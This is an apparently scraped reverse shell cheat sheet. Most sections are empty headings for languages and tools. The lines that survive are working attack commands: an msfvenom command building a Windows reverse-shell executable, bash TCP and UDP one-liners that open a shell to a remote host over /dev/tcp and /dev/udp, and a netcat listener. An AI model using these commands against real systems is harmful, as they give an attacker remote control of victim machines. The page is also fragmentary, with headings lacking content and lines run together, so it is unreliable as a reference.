Reverse Shell Cheat Sheet
2 ways to use Msfvenom Payload with Netcat
1st Method
2nd Method
msfvenom -p windows/shell_reverse_tcp lhost=ip lport=8888 –f exe > /root/Desktop/1.exeReverse Shell
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196Bash UDP
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242Socat
Perl
Python
PHP
Ruby
Golang
Netcat Traditional
Netcat OpenBsd
Ncat
OpenSSL
Powershell
Awk
Java
War
Lua
NodeJS
Groovy
Meterpreter Shell
Windows Staged reverse TCP
Windows Stageless reverse TCP
Linux Staged reverse TCP
Linux Stageless reverse TCP
Other platforms
Spawn TTY Shell
Last updated
Was this helpful?